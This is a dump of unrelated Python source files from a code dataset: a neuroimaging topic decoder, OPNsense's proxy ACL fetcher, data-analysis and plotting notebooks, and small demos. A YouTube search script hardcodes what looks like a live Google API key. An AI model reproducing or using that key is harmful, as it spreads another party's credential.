+{"seq_id": "598225079", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n\"\"\"\nClass and functions for functional decoding.\n\"\"\"\nfrom __future__ import print_function, division\n\nfrom builtins import object\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom nilearn.masking import apply_mask, unmask\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom .due import due, Doi\n\n\n@due.dcite(Doi('10.1371/journal.pcbi.1005649'),\n description='Describes decoding methods using GC-LDA.')\nclass Decoder(object):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n def __init__(self, model):\n \"\"\"\n Class object for a gcLDA decoder\n \"\"\"\n self.model = model\n self.dataset = model.dataset\n\n def decode_roi(self, roi, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for discrete image inputs (e.g., regions\n of interest, significant clusters).\n\n 1. Compute p_topic_g_voxel.\n - I think you need p_voxel_g_topic for this, then you do:\n - p_topic_g_voxel = p_voxel_g_topic * p_topic / p_voxel\n - What is p_voxel here?\n 2. Compute topic weight vector (tau_t).\n - topic_weights = np.sum(p_topic_g_voxel, axis=1) (across voxels)\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your selected studies.\n \"\"\"\n if type(roi) == str:\n roi = nib.load(roi)\n\n if not np.array_equal(roi.affine, self.model.dataset.mask_img.affine):\n str1 = np.array2string(roi.affine)\n str2 = np.array2string(self.model.dataset.mask_img.affine)\n raise ValueError('Input roi must have same affine as mask img:'\n '\\n{0}\\n{1}'.format(str1, str2))\n\n # Load ROI file and get ROI voxels overlapping with brain mask\n roi_arr = roi.get_data() & self.model.dataset.mask_img.get_data()\n roi_voxels = np.where(roi_arr > 0)[0]\n\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n p_topic_g_roi = p_topic_g_voxel[roi_voxels, :] # p(T|V) for voxels in ROI only\n topic_weights = np.sum(p_topic_g_roi, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def decode_continuous(self, image, topic_priors=None):\n \"\"\"\n Perform image-to-text decoding for continuous inputs (e.g.,\n unthresholded statistical maps).\n\n 1. Compute p_topic_g_voxel.\n 2. Compute topic weight vector (tau_t) by multiplying p_topic_g_voxel\n by input image.\n 3. Multiply tau_t by topic-by-word matrix (p_word_g_topic).\n 4. 
The resulting vector (tau_t*p_word_g_topic) should be word weights\n for your map, but the values are scaled based on the input image, so\n they won't necessarily mean much.\n \"\"\"\n # Load image file and get voxel values\n input_values = apply_mask(image, self.model.dataset.mask_img)\n p_topic_g_voxel, _ = self.model.get_spatial_probs()\n topic_weights = np.abs(np.squeeze(np.dot(p_topic_g_voxel.T, input_values[:, None])))\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n # Multiply topic_weights by topic-by-word matrix (p_word_g_topic).\n n_word_tokens_per_topic = np.sum(self.model.n_word_tokens_word_by_topic, axis=0)\n p_word_g_topic = self.model.n_word_tokens_word_by_topic / n_word_tokens_per_topic[None, :]\n p_word_g_topic = np.nan_to_num(p_word_g_topic, 0)\n word_weights = np.dot(p_word_g_topic, topic_weights)\n\n decoded_df = pd.DataFrame(index=self.model.dataset.word_labels, columns=['Weight'],\n data=word_weights)\n decoded_df.index.name = 'Term'\n return decoded_df, topic_weights\n\n def encode(self, text, out_file=None, topic_priors=None):\n \"\"\"\n Perform text-to-image encoding.\n\n 1. Compute p_topic_g_word.\n - p_topic_g_word = p_word_g_topic * p_topic / p_word\n - p_topic is uniform (1/n topics)\n 2. Compute topic weight vector (tau_t).\n - tau_t = np.sum(p_topic_g_word, axis=1) (across words)\n 3. Multiply tau_t by topic-by-voxel matrix of smoothed p_voxel_g_topic\n (A; not sure where it is, but I don't think it's the same as A in\n model.py).\n 4. The resulting map (tau_t*A) is the encoded image. Values are *not*\n probabilities.\n \"\"\"\n if isinstance(text, list):\n text = ' '.join(text)\n\n # Assume that words in word_labels are underscore-separated.\n # Convert to space-separation for vectorization of input string.\n vocabulary = [term.replace('_', ' ') for term in self.model.dataset.word_labels]\n max_len = max([len(term.split(' ')) for term in vocabulary])\n vectorizer = CountVectorizer(vocabulary=self.model.dataset.word_labels,\n ngram_range=(1, max_len))\n word_counts = np.squeeze(vectorizer.fit_transform([text]).toarray())\n keep_idx = np.where(word_counts > 0)[0]\n text_counts = word_counts[keep_idx]\n\n n_topics_per_word_token = np.sum(self.model.n_word_tokens_word_by_topic, axis=1)\n p_topic_g_word = self.model.n_word_tokens_word_by_topic / n_topics_per_word_token[:, None]\n p_topic_g_word = np.nan_to_num(p_topic_g_word, 0)\n p_topic_g_text = p_topic_g_word[keep_idx] # p(T|W) for words in text only\n prod = p_topic_g_text * text_counts[:, None] # Multiply p(T|W) by words in text\n topic_weights = np.sum(prod, axis=0) # Sum across words\n if topic_priors is not None:\n topic_weights *= topic_priors\n topic_weights /= np.sum(topic_weights) # tau_t\n\n _, p_voxel_g_topic = self.model.get_spatial_probs()\n voxel_weights = np.dot(p_voxel_g_topic, topic_weights)\n voxel_weights_matrix = unmask(voxel_weights, self.model.dataset.mask_img)\n\n img = nib.Nifti1Image(voxel_weights_matrix, self.model.dataset.mask_img.affine)\n if out_file is not None:\n img.to_filename(out_file)\n return img, topic_weights\n", "sub_path": "gclda/decode.py", "file_name": "decode.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "builtins.object", "line_number": 20, "usage_type": "name"}, {"api_name": "nibabel.load", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array_equal", 
"line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array2string", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 70, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "nilearn.masking.apply_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 148, "usage_type": "call"}, {"api_name": "nilearn.masking.unmask", "line_number": 149, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 151, "usage_type": "call"}, {"api_name": "due.due.dcite", "line_number": 18, "usage_type": "call"}, {"api_name": "due.due", "line_number": 18, "usage_type": "name"}, {"api_name": "due.Doi", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "148249861", "text": "from apiclient.discovery import build\n\n\nDEVELOPER_KEY = \"AIzaSyDngQv_cVeUuk1LMrqwvP0M-8s6XfgqpGs\"\nYOUTUBE_API_SERVICE_NAME = \"youtube\"\nYOUTUBE_API_VERSION = \"v3\"\nyoutube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\nsearch_response = youtube.search().list(\n q='asmr 귀',\n part=\"id,snippet\",\n maxResults=25\n ).execute()\n\nprint(search_response)", "sub_path": "startone.py", "file_name": "startone.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "apiclient.discovery.build", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "179958025", "text": "import multiprocessing\r\n\r\ndef myProcFn():\r\n print('Executing child process (with its own GIL)')\r\n\r\ndef main():\r\n print('Executign the main process')\r\n myProc2 = multiprocessing.Process(target=myProcFn)\r\n myProc2.start()\r\n myProc2.join()\r\n print('child process has terminated')\r\n\r\nif __name__ == '__main__':\r\n main()", "sub_path": "data/beyondAdvancedPythonApril2021-main/using_processes/p1_proc_fn.py", "file_name": "p1_proc_fn.py", "file_ext": "py", "file_size_in_byte": 336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "289374951", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\n\ndef genDataSet(N):\n x = np.random.normal(0, 1, N)\n ytrue = (np.cos(x) + 2) / (np.cos(x * 1.4) + 2)\n noise = np.random.normal(0, 0.2, N)\n y = ytrue + noise\n return x, y, ytrue\n\nx, y, ytrue = genDataSet(100)\nplt.plot(x,y,'.')\nplt.plot(x,ytrue,'rx')\nplt.show()\n", "sub_path": "mulligan-03/hw3_1_a_gendata.py", "file_name": "hw3_1_a_gendata.py", "file_ext": "py", "file_size_in_byte": 330, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.normal", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "522957404", "text": "import serial\nimport time\nimport json\nimport random\nimport arena\nfrom threading import Thread\nfrom utils import send_alert2\n\n# Global for keeping track of which sensor to display data from\n\ntest_email = True\n\n\n\n\nemail_status= False\n\nif test_email and email_status==False:\n send_alert2()\n email_status=True\n\ndef start_serial():\n global sensor_to_read\n global reading_text\n\n\n\n global email_status \n# global test_email\n global door_status\n\n # set up the serial line\n ser = serial.Serial('COM4', 9600)\n time.sleep(2)\n \n \n while True:\n if email_status and door_status == True:\n ser.write(\"blink\\n\".encode())\n \n elif email_status and door_status == False:\n ser.write(\"dont blink\\n\".encode())\n time.sleep(1)\n\n ser.close()\n\n\ndef scene_callback(msg):\n print(\"scene_callback: \", msg)\n\narena.init(\"arena.andrew.cmu.edu\", \"realm\", \"patrick_scene\")#, scene_callback)\n\n\n\n\ndoor_status = False\ndef door_button_callback(event):\n global door_obj\n global door_status\n if event.event_type == arena.EventType.mousedown:\n if door_status:\n door_status = False\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\", \"from\": \"0 90 0\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 1000}}')\n else:\n door_status = True\n door_obj.update(data='{\"animation\": { \"property\": \"rotation\",\"from\": \"0 0 0\", \"to\": \"0 90 0 \", \"loop\": false, \"dur\": 1000}}')\ndoor_obj = arena.Object(\n objName = \"door\",\n objType=arena.Shape.cube,\n scale=(0.1,2,1.2),\n location=(-9,1.6,-2),\n clickable=False,\n data='{\"animation\": { \"property\": \"rotation\", \"to\": \"0 0 0\", \"loop\": false, \"dur\": 0}}',\n)\nbutton_door = arena.Object(\n objName = \"button_dor\",\n objType=arena.Shape.cube,\n scale=(1,1,1),\n location=(-11,1.6,-3),\n clickable=True,\n callback=door_button_callback,\n color = (255,0, 255)\n)\n \n\nthread = Thread(target = start_serial)\nthread.start()\narena.handle_events()\n\nthread.join()", "sub_path": "misc_files/source_code/ECE202A-main/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.send_alert2", "line_number": 19, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 43, "usage_type": "call"}, {"api_name": "arena.init", "line_number": 51, "usage_type": "call"}, {"api_name": "arena.EventType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 67, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 69, "usage_type": "attribute"}, {"api_name": "arena.Object", "line_number": 75, "usage_type": "call"}, {"api_name": "arena.Shape", "line_number": 77, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 86, "usage_type": "call"}, {"api_name": "arena.handle_events", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "604990399", "text": "#!/usr/local/bin/python2.7\n\n\"\"\"\n Copyright (c) 2015 Jos Schellevis - Deciso B.V.\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n 1. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n 2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,\n INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\n AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport urllib2\nimport os\nimport os.path\nimport tarfile\nimport gzip\nimport zipfile\nimport StringIO\nimport syslog\nfrom ConfigParser import ConfigParser\n\nacl_config_fn = ('/usr/local/etc/squid/externalACLs.conf')\nacl_target_dir = ('/usr/local/etc/squid/acl')\nacl_max_timeout = 30\n\nclass ACLDownload(object):\n\n def __init__(self, url, timeout):\n \"\"\" init new\n \"\"\"\n self._url = url\n self._timeout = timeout\n self._source_data = None\n self._target_data = None\n\n def fetch(self):\n \"\"\" fetch (raw) source data into self._source_data\n \"\"\"\n try:\n f = urllib2.urlopen(self._url,timeout = self._timeout)\n self._source_data = f.read()\n f.close()\n except (urllib2.URLError, urllib2.HTTPError, IOError) as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s'%self._url)\n self._source_data = None\n\n def pre_process(self):\n \"\"\" pre process downloaded data, handle compression\n \"\"\"\n if self._source_data is not None:\n # handle compressed data\n if (len(self._url) > 8 and self._url[-7:] == '.tar.gz') \\\n or (len(self._url) > 4 and self._url[-4:] == '.tgz'):\n # source is in tar.gz format, extract all into a single string\n try:\n tf = tarfile.open(fileobj=StringIO.StringIO(self._source_data))\n target_data = []\n for tf_file in tf.getmembers():\n if tf_file.isfile():\n target_data.append(tf.extractfile(tf_file).read())\n self._target_data = ''.join(target_data)\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 4 and self._url[-3:] == '.gz':\n # source is in .gz format unpack\n try:\n gf = gzip.GzipFile(mode='r', fileobj=StringIO.StringIO(self._source_data))\n self._target_data = gf.read()\n except IOError as e:\n syslog.syslog(syslog.LOG_ERR, 'proxy acl: error downloading %s (%s)'%(self._url, e))\n elif len(self._url) > 5 and self._url[-4:] == '.zip':\n # source is in .zip format, extract all into a single string\n target_data = []\n with zipfile.ZipFile(StringIO.StringIO(self._source_data),\n mode='r',\n compression=zipfile.ZIP_DEFLATED) as zf:\n for item in zf.infolist():\n target_data.append(zf.read(item))\n self._target_data = 
''.join(target_data)\n else:\n self._target_data = self._source_data\n\n def download(self):\n self.fetch()\n self.pre_process()\n\n def is_valid(self):\n \"\"\" did this ACL download successful\n \"\"\"\n if self._target_data is not None:\n return True\n else:\n return False\n\n def get_data(self):\n \"\"\" retrieve data\n \"\"\"\n # XXX: maybe some postprocessing is needed here, all will be used with a squid dstdom_regex tag\n return self._target_data\n\n\n# parse OPNsense external ACLs config\nif os.path.exists(acl_config_fn):\n # create acl directory (if new)\n if not os.path.exists(acl_target_dir):\n os.mkdir(acl_target_dir)\n # read config and download per section\n cnf = ConfigParser()\n cnf.read(acl_config_fn)\n for section in cnf.sections():\n # check if tag enabled exists in section\n if cnf.has_option(section,'enabled'):\n # if enabled fetch file\n target_filename = acl_target_dir+'/'+section\n if cnf.get(section,'enabled')=='1':\n if cnf.has_option(section,'url'):\n download_url = cnf.get(section,'url')\n acl = ACLDownload(download_url, acl_max_timeout)\n acl.download()\n if acl.is_valid():\n output_data = acl.get_data()\n with open(target_filename, \"wb\") as code:\n code.write(output_data)\n elif not os.path.isfile(target_filename):\n # if there's no file available, create an empty one (otherwise leave the last download).\n with open(target_filename, \"wb\") as code:\n code.write(\"\")\n # if disabled or not 1 try to remove old file\n elif cnf.get(section,'enabled')!='1':\n try:\n os.remove(acl_target_dir+'/'+section)\n except OSError:\n pass\n", "sub_path": "src/opnsense/scripts/proxy/fetchACLs.py", "file_name": "fetchACLs.py", "file_ext": "py", "file_size_in_byte": 6201, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "urllib2.urlopen", "line_number": 57, "usage_type": "call"}, {"api_name": "urllib2.URLError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "urllib2.HTTPError", "line_number": 60, "usage_type": "attribute"}, {"api_name": "syslog.syslog", "line_number": 61, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 73, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 73, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 80, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 80, "usage_type": "attribute"}, {"api_name": "gzip.GzipFile", "line_number": 84, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 84, "usage_type": "call"}, {"api_name": "syslog.syslog", "line_number": 87, "usage_type": "call"}, {"api_name": "syslog.LOG_ERR", "line_number": 87, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 91, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 91, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "ConfigParser.ConfigParser", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 141, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 148, "usage_type": "call"}]}
+{"seq_id": "145311008", "text": "# -*- coding: utf-8 -*-\r\nimport re,pymysql\r\nconnection = pymysql.connect(host='127.0.0.1',port=3306,user='root',password='*',db='ysdd',charset='utf8')\r\ncursor = connection.cursor()\r\nsql=\"select ROE,ycpdays,cpdays,realid from cpgz where red=1 and zf=1\"\r\ncursor.execute(sql)\r\ndates = cursor.fetchall()\r\nfor date in dates:\r\n dalygrade = float(date[0][:-1]) / date[1]\r\n ROE = dalygrade * date[2]\r\n parameter = 0.3 + (date[2] / 5) * 0.5\r\n gROE = (ROE*1.113-parameter)*0.19+parameter if ROE*1.1113 > parameter else parameter\r\n wgROE = (ROE*1.113-parameter)*0.2+parameter if ROE*1.1113 > parameter else parameter\r\n fxROE = 10 * ROE - 9 * wgROE\r\n sql=\"update cpgz set dalygrade=%0.4f,gROE=%0.4f,ROE='%0.2f%%' where realid='%s'\" %(dalygrade,gROE,ROE,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\n sql = \"select stocks from hzb where realid='%s'\" %(date[3])\r\n cursor.execute(sql)\r\n stocks = cursor.fetchone()\r\n money = stocks[0] * (100+ROE) * 100\r\n sql=\"update hzb set investor='%0.2f%%',trader='%0.2f%%',money=%d where realid='%s'\" %(gROE,fxROE,money,date[3])\r\n cursor.execute(sql)\r\n connection.commit()\r\nconnection.close()\r\n \r\n \r\n\r\n \r\n \r\n", "sub_path": "cpxz.py", "file_name": "cpxz.py", "file_ext": "py", "file_size_in_byte": 1199, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymysql.connect", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "434590240", "text": "\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Draw inline\nget_ipython().magic(u'matplotlib inline')\n\n# Set figure aesthetics\nsns.set_style(\"white\", {'ytick.major.size': 10.0})\nsns.set_context(\"poster\", font_scale=1.1)\n\n\n# In[2]:\n\n# Load the data into DataFrames\ntrain_users = pd.read_csv('../input/train_users_2.csv')\ntest_users = pd.read_csv('../input/test_users.csv')\n\n\n# In[4]:\n\nprint(train_users.shape[0],test_users.shape[0])\n\n\n# In[6]:\n\n# Merge train and test users\nusers = pd.concat((train_users, test_users), axis=0, ignore_index=True)\n\n# Remove ID\nusers.drop('id',axis=1, inplace=True)\n\nusers.head(10)\n\n\n# In[6]:\n\nusers.gender.replace('-unknown-', np.nan, inplace=True)\n\n\n# In[15]:\n\nusers_nan = (users.isnull().sum() / users.shape[0]) * 100\nusers_nan[users_nan > 0].drop('country_destination')\n\n\n# In[18]:\n\n#check\nprint(int((train_users.date_first_booking.isnull().sum() / train_users.shape[0]) * 100))\n\n\n# In[19]:\n\nusers.age.describe()\n\n\n# In[20]:\n\nprint(sum(users.age > 100))\nprint(sum(users.age < 18))\n\n\n# In[21]:\n\nusers[users.age > 100]['age'].describe()\n\n\n# In[22]:\n\nusers[users.age < 18]['age'].describe()\n\n\n# In[23]:\n\nusers.loc[users.age > 95, 'age'] = np.nan\nusers.loc[users.age < 13, 'age'] = np.nan\n\n\n# In[24]:\n\ncategorical_features = [\n 'affiliate_channel',\n 'affiliate_provider',\n 'country_destination',\n 'first_affiliate_tracked',\n 'first_browser',\n 'first_device_type',\n 'gender',\n 'language',\n 'signup_app',\n 'signup_method'\n]\n\nfor categorical_feature in categorical_features:\n users[categorical_feature] = users[categorical_feature].astype('category')\n\n\n# In[25]:\n\nusers['date_account_created'] = pd.to_datetime(users['date_account_created'])\nusers['date_first_booking'] = pd.to_datetime(users['date_first_booking'])\nusers['date_first_active'] = pd.to_datetime((users.timestamp_first_active // 1000000), format='%Y%m%d')\n\n\n# In[26]:\n\nseries = pd.Series(users.gender.value_counts(dropna=False))\n\n\n# In[28]:\n\nseries.plot.pie(figsize=(5, 5))\n\n\n# In[37]:\n\nwomen = sum(users['gender'] == 'FEMALE')\nmen = sum(users['gender'] == 'MALE')\n\nfemale_destinations = users.loc[users['gender'] == 'FEMALE', 'country_destination'].value_counts() / women * 100\nmale_destinations = users.loc[users['gender'] == 'MALE', 'country_destination'].value_counts() / men * 100\n\n# Bar width\nwidth = 0.4\n\nmale_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Male', rot=0)\nfemale_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Female', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[42]:\n\ndestination_percentage = users.country_destination.value_counts() / users.shape[0] * 100\ndestination_percentage.plot(kind='bar',color='#20B2AA', rot=0)\n# Using seaborn to plot\nsns.countplot(x=\"country_destination\", data=users, order=list(users.country_destination.value_counts().keys()))\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n# sns.despine()\n\n\n# In[44]:\n\nsns.kdeplot(users.age.dropna(), color='#20B2AA', shade=True)\nplt.xlabel('Age')\nplt.ylabel('Distribution of age')\nsns.despine()\n\n\n# In[45]:\n\nage = 40\n\nyounger = sum(users.loc[users['age'] < age, 'country_destination'].value_counts())\nolder = 
sum(users.loc[users['age'] > age, 'country_destination'].value_counts())\n\nyounger_destinations = users.loc[users['age'] < age, 'country_destination'].value_counts() / younger * 100\nolder_destinations = users.loc[users['age'] > age, 'country_destination'].value_counts() / older * 100\n\nyounger_destinations.plot(kind='bar', width=width, color='#3CB371', position=0, label='Youngers', rot=0)\nolder_destinations.plot(kind='bar', width=width, color='#6495ED', position=1, label='Olders', rot=0)\n\nplt.legend()\nplt.xlabel('Destination Country')\nplt.ylabel('Percentage of the user')\n\nsns.despine()\nplt.show()\n\n\n# In[50]:\n\ndf=users.date_account_created.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('First create account')\n\n\n# In[51]:\n\ndf=users.date_first_active.value_counts()\nplt.figure()\ndf.plot(colormap='winter')\nplt.xlabel('Fisrt active account')\n\n", "sub_path": "Visualization.py", "file_name": "Visualization.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "seaborn.set_style", "line_number": 15, "usage_type": "call"}, {"api_name": "seaborn.set_context", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 108, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 109, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "seaborn.kdeplot", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 158, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 158, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 159, "usage_type": "call"}, 